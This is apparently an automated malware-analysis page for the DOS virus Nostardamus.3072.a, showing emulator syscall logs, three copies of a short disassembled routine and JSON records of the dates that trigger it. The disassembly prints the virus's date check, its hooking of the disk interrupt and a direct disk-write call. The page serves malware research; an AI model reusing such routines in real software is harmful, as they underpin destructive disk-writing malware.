Sample viewer

vx.netlux.org/Virus.DOS.Nostardamus.3072.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:38:25.198139784Z 42 PC: 144ec | Get date 0x144ec: inc al
0x144ee: shl al, 1
0x144f0: cmp dl, al
0x144f2: jne 0x14527
0x144f4: mov ah, 0x13
0x144f6: int 0x2f
0x144f8: push ds
0x144f9: push dx
0x144fa: mov ah, 0x13
0x144fc: int 0x2f
0x144fe: pop dx
0x144ff: pop ds
0x14500: mov ax, 0x2513
0x14503: int 0x21
0x14505: mov cx, 1
0x14508: mov dx, 0x580
0x1450b: mov ax, 0x308
0x1450e: int 0x13
0x14510: jb 0x1451f
0x14512: dec dh

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6571,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:50.661602525Z 42 PC: 144ec | Get date 0x144ec: inc al
0x144ee: shl al, 1
0x144f0: cmp dl, al
0x144f2: jne 0x14527
0x144f4: mov ah, 0x13
0x144f6: int 0x2f
0x144f8: push ds
0x144f9: push dx
0x144fa: mov ah, 0x13
0x144fc: int 0x2f
0x144fe: pop dx
0x144ff: pop ds
0x14500: mov ax, 0x2513
0x14503: int 0x21
0x14505: mov cx, 1
0x14508: mov dx, 0x580
0x1450b: mov ax, 0x308
0x1450e: int 0x13
0x14510: jb 0x1451f
0x14512: dec dh

{"DateBased":true,"Day":10,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6571,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:50.668454922Z 42 PC: 144ec | Get date 0x144ec: inc al
0x144ee: shl al, 1
0x144f0: cmp dl, al
0x144f2: jne 0x14527
0x144f4: mov ah, 0x13
0x144f6: int 0x2f
0x144f8: push ds
0x144f9: push dx
0x144fa: mov ah, 0x13
0x144fc: int 0x2f
0x144fe: pop dx
0x144ff: pop ds
0x14500: mov ax, 0x2513
0x14503: int 0x21
0x14505: mov cx, 1
0x14508: mov dx, 0x580
0x1450b: mov ax, 0x308
0x1450e: int 0x13
0x14510: jb 0x1451f
0x14512: dec dh
2018-12-25T11:59:50.670942052Z 37 PC: 14505 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')